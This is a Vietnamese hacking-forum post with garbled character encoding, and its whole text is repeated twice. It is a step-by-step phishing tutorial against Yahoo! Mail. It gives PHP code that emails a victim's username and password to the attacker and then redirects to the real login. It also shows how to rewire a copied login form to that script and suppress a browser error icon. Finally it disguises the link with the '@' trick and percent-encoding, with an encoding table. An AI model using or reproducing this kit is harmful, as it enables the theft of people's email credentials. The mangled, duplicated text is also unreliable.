boymc
18-05-05, 11:38 PM
BÆ°á»›c 1. Tạo Fake login: Muốn lấy được pass của victim vá»›i tỉ lệ thà nh công cao, bạn phải có má»™t trang Web dá»m y hệt nhÆ° của Yahoo! Mail
Thuổng của ngÆ°á»i khác:
QUOTE
Tạo tệp yahoo.PHP, đoạn code như sau:
<?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last= &promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persistent=");
?>
Save as trang chÃnh của yahoo! mail, sau đó mở tệp nà y bằng Notepate và tìm đến dòng:
<FORM name=login_form onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action=http://login.yahoo.com/config/login method=post autocomplete="off">
Thay đoạn nà y bằng :
<FORM action="http://trang Web có hỗ trợ php/tên đăng kà của bạn/yahoo.php" method="post">
Cái nà y thì cá»±c nhiá»u hÆ°á»›ng dẫn trên diá»…n Ä‘Ã n rồi, nhÆ°ng có má»™t số lá»—i sau khiến hiệu quả không được cao:
1: Äoạn code sá»a đổi <form> hoạt Ä‘á»™ng tốt, nhÆ°ng gây lá»—i trên trang Fake login, tôi không hiểu sao mấy chú trên forum quảng cáo rất nhiá»u vá» trang Fake login của mình mà không chịu sá»a nó Ä‘i......
Nếu bạn để ý, là m theo hÆ°á»›ng dẫn của bất kì bà i viết nà o hiện có trên diá»…n Ä‘Ã n, trang fake login cÅ©ng hiện lên 1 biểu tượng báo lá»—i (có dấu ! mà u và ng) ở Status bar, nếu victim tinh ý 1 tà là nháºn ra ngay, không cần nhìn lên Ä‘Æ°á»ng link là m gì cả
Cách sá»a: Thá»±c ra cÅ©ng chẳng có gì đáng nói, các chú tiết kiệm quá nên bá» qua mấy khai báo Ä‘Æ¡n giản:
Chỉ cần sá»a nhÆ° sau:
<FORM name=login_form action="http://trang Web có hỗ trợ php/tên đăng kà của bạn/yahoo.php" method="post" autocomplete="off">
Ổn rồi phải không, thà nh công 1 bước nhỠtrong việc che mắt victim........
2. Nhìn cái Ä‘Æ°á»ng link của mấy chú thấy chán cả ngÆ°á»i, ai lại giao diện của Yahoo! Mail mà tên Ä‘Æ°á»ng dẫn lại cá»±c chuối củ...... No problem, thá»±c tế thì chẳng ai đăng kà được 1 cái domain giông giống nhÆ° mail.yahoo.com cả...... Cách khắc phục đây:
Cái nà y thuổng của ngÆ°á»i khác:
QUOTE
Nếu trÆ°á»›c Ä‘Æ°á»ng link, ta thêm "@", rồi oánh lia lịa các kà tá»± vá»› vỉn, thì IE cÅ©ng chỉ công nháºn các kà tá»± ở đằng sau "@" mà thôi
1 ý tưởng hay, do đó, bạn có thể thêm www.mail.yahoo@ và o đằng trÆ°á»›c Ä‘Æ°á»ng link của bạn,
VD: http://www.mail.yahoo@trang Web có hỗ trợ php/tên đăng kà của bạn
hehhe, thÆ°á»ng là victim chỉ nhìn mấy cái chữ đầu của Ä‘Æ°á»ng link mà thôi, do đó nhìn nhÆ° váºy cÅ©ng tạm ổn phải không..... nếu chú nà o dể tÃnh thì uh, nhÆ°ng tôi thì không, đã là m là phải lừa không được 100% thì cÅ©ng phải 95-96% chứ, nhìn cái tên trang Web của bạn nó vẫn lù lù đằng sau kia kìa, ai mà chẳng nháºn ra.....
Do đó, có 1 cách cực hay sau:
Mã hoá Url: Dùng cái nà y có thể mã hoá Ä‘Æ°á»ng link của bạn thà nh các kà tá»± loằng ngoằng, khó ai dịch được (nhÆ°ng IE lại chấp nháºn). Ä‘iá»u đó sẽ khiến victim không Ä‘á» phòng nổi do Ä‘Æ°á»ng link trông hầu nhÆ° hao hao vá»›i trang Yahoo! Mail khi ta Sign Out
Giới thiệu qua: Forum http://www.vnhacker.org/forum khi được mã hoá sẽ như sau:
http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D
Trông loằng ngoăng hợp lệ chÆ°a??? Bạn thá» copy Ä‘Æ°á»ng link trên cho chạy thá» xem sao???Äảm bảo dẫn đến forum..... hehheh
Và sau đây là bảng hướng dẫn mã hoá:
a ---> %61 b ---> %62 c ---> %63 d ---> %64 e ---> %65
A ---> %41 B ---> %42 C ---> %43 D ---> %44 E ---> %45
f ---> %66 g ---> %67 h ---> %68 i ---> %69 j ---> %6A
F ---> %46 G ---> %47 H ---> %48 I ---> %49 J ---> %4A
k ---> %6B l ---> %6C m ---> %6D n ---> %6E o ---> %6F
K ---> %4B L ---> %4C M ---> %4D N ---> %4E O ---> %4F
p ---> %70 q ---> %71 r ---> %72 s ---> %73 t ---> %74
P ---> %50 Q ---> %51 R ---> %52 S ---> %53 T ---> %54
u ---> %75 v ---> %76 w ---> %77 x ---> %78 y ---> %79
U ---> %55 V ---> %56 W ---> %57 X ---> %58 Y ---> %59
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
Okie, được rồi đó, lÆ°u ý nhÆ° sau: Ä‘Æ°á»ng link nà o dù loằng ngoằng đến đâu thì cÅ©ng vẫn có các chữ và con số, do đó bạn không nên mã hoá tất cả, mà chỉ mã hoá 1 số từ nhạy cảm, và dụ www11.brinkster.com chẳng hạn, để victim không nháºn ra là brinkster, bạn mã hoá má»™t số từ thôi:
w%77w1%31.br%69ks%74er%2Ecom
hehhe, hợp lý chứ.......
Thuổng của ngÆ°á»i khác:
QUOTE
Tạo tệp yahoo.PHP, đoạn code như sau:
<?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last= &promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persistent=");
?>
Save as trang chÃnh của yahoo! mail, sau đó mở tệp nà y bằng Notepate và tìm đến dòng:
<FORM name=login_form onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action=http://login.yahoo.com/config/login method=post autocomplete="off">
Thay đoạn nà y bằng :
<FORM action="http://trang Web có hỗ trợ php/tên đăng kà của bạn/yahoo.php" method="post">
Cái nà y thì cá»±c nhiá»u hÆ°á»›ng dẫn trên diá»…n Ä‘Ã n rồi, nhÆ°ng có má»™t số lá»—i sau khiến hiệu quả không được cao:
1: Äoạn code sá»a đổi <form> hoạt Ä‘á»™ng tốt, nhÆ°ng gây lá»—i trên trang Fake login, tôi không hiểu sao mấy chú trên forum quảng cáo rất nhiá»u vá» trang Fake login của mình mà không chịu sá»a nó Ä‘i......
Nếu bạn để ý, là m theo hÆ°á»›ng dẫn của bất kì bà i viết nà o hiện có trên diá»…n Ä‘Ã n, trang fake login cÅ©ng hiện lên 1 biểu tượng báo lá»—i (có dấu ! mà u và ng) ở Status bar, nếu victim tinh ý 1 tà là nháºn ra ngay, không cần nhìn lên Ä‘Æ°á»ng link là m gì cả
Cách sá»a: Thá»±c ra cÅ©ng chẳng có gì đáng nói, các chú tiết kiệm quá nên bá» qua mấy khai báo Ä‘Æ¡n giản:
Chỉ cần sá»a nhÆ° sau:
<FORM name=login_form action="http://trang Web có hỗ trợ php/tên đăng kà của bạn/yahoo.php" method="post" autocomplete="off">
Ổn rồi phải không, thà nh công 1 bước nhỠtrong việc che mắt victim........
2. Nhìn cái Ä‘Æ°á»ng link của mấy chú thấy chán cả ngÆ°á»i, ai lại giao diện của Yahoo! Mail mà tên Ä‘Æ°á»ng dẫn lại cá»±c chuối củ...... No problem, thá»±c tế thì chẳng ai đăng kà được 1 cái domain giông giống nhÆ° mail.yahoo.com cả...... Cách khắc phục đây:
Cái nà y thuổng của ngÆ°á»i khác:
QUOTE
Nếu trÆ°á»›c Ä‘Æ°á»ng link, ta thêm "@", rồi oánh lia lịa các kà tá»± vá»› vỉn, thì IE cÅ©ng chỉ công nháºn các kà tá»± ở đằng sau "@" mà thôi
1 ý tưởng hay, do đó, bạn có thể thêm www.mail.yahoo@ và o đằng trÆ°á»›c Ä‘Æ°á»ng link của bạn,
VD: http://www.mail.yahoo@trang Web có hỗ trợ php/tên đăng kà của bạn
hehhe, thÆ°á»ng là victim chỉ nhìn mấy cái chữ đầu của Ä‘Æ°á»ng link mà thôi, do đó nhìn nhÆ° váºy cÅ©ng tạm ổn phải không..... nếu chú nà o dể tÃnh thì uh, nhÆ°ng tôi thì không, đã là m là phải lừa không được 100% thì cÅ©ng phải 95-96% chứ, nhìn cái tên trang Web của bạn nó vẫn lù lù đằng sau kia kìa, ai mà chẳng nháºn ra.....
Do đó, có 1 cách cực hay sau:
Mã hoá Url: Dùng cái nà y có thể mã hoá Ä‘Æ°á»ng link của bạn thà nh các kà tá»± loằng ngoằng, khó ai dịch được (nhÆ°ng IE lại chấp nháºn). Ä‘iá»u đó sẽ khiến victim không Ä‘á» phòng nổi do Ä‘Æ°á»ng link trông hầu nhÆ° hao hao vá»›i trang Yahoo! Mail khi ta Sign Out
Giới thiệu qua: Forum http://www.vnhacker.org/forum khi được mã hoá sẽ như sau:
http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D
Trông loằng ngoăng hợp lệ chÆ°a??? Bạn thá» copy Ä‘Æ°á»ng link trên cho chạy thá» xem sao???Äảm bảo dẫn đến forum..... hehheh
Và sau đây là bảng hướng dẫn mã hoá:
a ---> %61 b ---> %62 c ---> %63 d ---> %64 e ---> %65
A ---> %41 B ---> %42 C ---> %43 D ---> %44 E ---> %45
f ---> %66 g ---> %67 h ---> %68 i ---> %69 j ---> %6A
F ---> %46 G ---> %47 H ---> %48 I ---> %49 J ---> %4A
k ---> %6B l ---> %6C m ---> %6D n ---> %6E o ---> %6F
K ---> %4B L ---> %4C M ---> %4D N ---> %4E O ---> %4F
p ---> %70 q ---> %71 r ---> %72 s ---> %73 t ---> %74
P ---> %50 Q ---> %51 R ---> %52 S ---> %53 T ---> %54
u ---> %75 v ---> %76 w ---> %77 x ---> %78 y ---> %79
U ---> %55 V ---> %56 W ---> %57 X ---> %58 Y ---> %59
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
Okie, được rồi đó, lÆ°u ý nhÆ° sau: Ä‘Æ°á»ng link nà o dù loằng ngoằng đến đâu thì cÅ©ng vẫn có các chữ và con số, do đó bạn không nên mã hoá tất cả, mà chỉ mã hoá 1 số từ nhạy cảm, và dụ www11.brinkster.com chẳng hạn, để victim không nháºn ra là brinkster, bạn mã hoá má»™t số từ thôi:
w%77w1%31.br%69ks%74er%2Ecom
hehhe, hợp lý chứ.......